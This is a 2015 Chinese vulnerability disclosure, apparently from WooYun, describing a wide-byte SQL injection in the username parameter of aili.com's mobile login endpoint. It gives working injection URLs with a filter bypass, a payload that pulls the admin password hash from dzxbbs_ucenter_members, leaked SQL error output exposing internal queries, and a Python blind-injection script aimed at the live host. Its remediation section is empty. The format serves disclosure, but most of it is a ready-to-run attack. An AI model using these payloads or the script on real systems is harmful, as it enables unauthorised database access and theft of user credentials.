漏洞标题 爱丽某站宽字节注入及绕过(附验证脚本)可脱用户库
相关厂商 aili.com
漏洞作者 BMa
提交时间 2015-03-02 18:13
公开时间 2015-04-16 18:14
漏洞类型 SQL注射漏洞
危害等级
自评Rank 15
漏洞状态 厂商已经确认
Tags标签

漏洞详情

m.aili.com/index.php?a=on_global_loginbk&c=wap&callback=jsonp1425083838041&chkcode=e&m=member&pwd=e1671797c52e15f763380b45e841ec32&username=%bf'

参数:username

泄露用户表和列:

用户表:dzxbbs_ucenter_members

用户列:uid,username,email,salt,password

所以即使是sqlmap无法跑出数据,也可以用自己的脚本脱裤,

1.jpg

可惜用sqlmap+tamper跑不出来,只能证明存在漏洞:

3.jpg

4.jpg

接下来便是构造盲注,测试发现后台可能存在过滤或者其他防护机制,构造如下语句绕过:

http://m.aili.com/index.php?a=on_global_loginbk&c=wap&callback=jsonp1425083838041&chkcode=e&m=member&pwd=e1671797c52e15f763380b45e841ec32&username=%bf%27%0a||%0a12=12%0a%23

正确返回:

5.png

错误返回:

6.png

得到version:

7.png

得到user:

8.png

得到数据库:

9.png

查看用户数:

10.png

其中还泄露了一些其他信息:可以得到一些数据库信息:数据库、表、列

xinxi.png

code 区域 
System Maintenance......

Please wait Try.Link-ID == false, connect failedSystem Maintenance......

Please wait Try.Link-ID == false, connect failedSystem Maintenance......

Please wait Try.cannot use database newcmsSystem Maintenance......

Please wait Try.cannot use database2 newcmsSystem Maintenance......

Please wait Try.Invalid SQL: SELECT * FROM channels WHERE iswap = 1 ORDER BY wapsort descSystem Maintenance......

Please wait Try.Invalid SQL: SELECT a.aid,a.type,a.title,a.stitle,a.ltitle,a.ftitle,a.channel,a.colu,a.tip,a.original,a.url,b.cover FROM (archives a inner JOIN `articles` b ON a.aid = b.aid) inner join columns c ON a.colu = c.cid WHERE a.tip!='' and a.posttime < 1425139200 and a.recycled=0 and a.type=0 and a.channel in(1,2,34,50,52,64,48) and a.status=2 and a.pbstatus=0 and b.cover!='' and c.isshow!=1 ORDER BY a.posttime DESC LIMIT 0, 12System Maintenance......

Please wait Try.Invalid SQL: SELECT a.aid,a.type,a.title,a.url,a.channel,a.colu,b.content,b.cover FROM (archives a inner JOIN `images` b ON a.aid = b.aid) inner join columns c ON a.colu = c.cid WHERE a.recycled=0 and a.posttime < 1425139200 and a.type=1 and a.status=2 and a.pbstatus=0 and a.channel in(1,2,34,50,52,64,48) and b.cover!='' and c.isshow!=1 ORDER BY a.posttime DESC LIMIT 0, 2System Maintenance......

Please wait Try.Invalid SQL: SELECT a.aid,a.type,a.title,a.url,a.channel,a.colu,b.cover FROM (archives a inner join `albums` b on a.aid=b.aid) inner join columns c ON a.colu = c.cid WHERE a.recycled=0 and a.posttime < 1425139200 and a.type=2 and a.status=2 and a.pbstatus=0 and a.channel in(1,2,34,50,52,64,48) and b.cover!='' and c.isshow!=1 ORDER BY a.posttime DESC LIMIT 0, 5System Maintenance......

Please wait Try.Invalid SQL: SELECT * FROM block WHERE pos = 'app_index_hd' 





System Maintenance......

Please wait Try.Link-ID == false, connect failedSystem Maintenance......

Please wait Try.cannot use database newcms

还可以构造查询用户admin的密码:

code 区域 
http://m.aili.com/index.php?a=on_global_loginbk&c=wap&callback=jsonp1425083838041&chkcode=e&m=member&pwd=e1671797c52e15f763380b45e841ec32&username=%bf%27%0a||%0aascii(mid(lower(SELECT%0apassword%0aFROM%0adzxbbs_ucenter_members%0aWHERE%0ausername%0a=%0a0x61646D696E),1,1))=3%0a%23

漏洞证明:

附验证脚本:

code 区域 
#encoding=utf-8

import httplib

import sys

import random



headers = {}

#payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')

payloads = list('0123456789')

print 'Start to retrive MySQL database:'

user = ''

base_url = "/index.php?a=on_global_loginbk&m=member&" + \

      "c=wap&callback=jsonp1425083838041&chkcode=e&" + \

      "pwd=e1671797c52e15f763380b45e841ec32&username="

for i in range(1,10):

    for payload in payloads:

        conn = httplib.HTTPConnection('m.aili.com', timeout=60)

        s = "%bf%27%0a||%0amid((select%0acount(*)%0afrom%0adzxbbs_ucenter_members),{0},1)={1}%0a%23".format(i,payload)

        conn.request(method='GET',

                     url = base_url + s,

                     headers=headers)

        html_doc = conn.getresponse().read().decode('utf-8')

        conn.close()

        if html_doc.find(u'error') > 0:    # True

            user += payload

            sys.stdout.write('\r[In Progress]' + user + '\r')

            sys.stdout.flush()

            break

        else:

            print 'WAITING...' + str(random.randint(1,100))

print '\n[Done]MySQL ALL users are ' + user

修复方案:

版权声明:转载请注明来源 BMa@乌云

转载请注明:安全脉搏 » 爱丽某站宽字节注入及绕过(附验证脚本)可脱用户库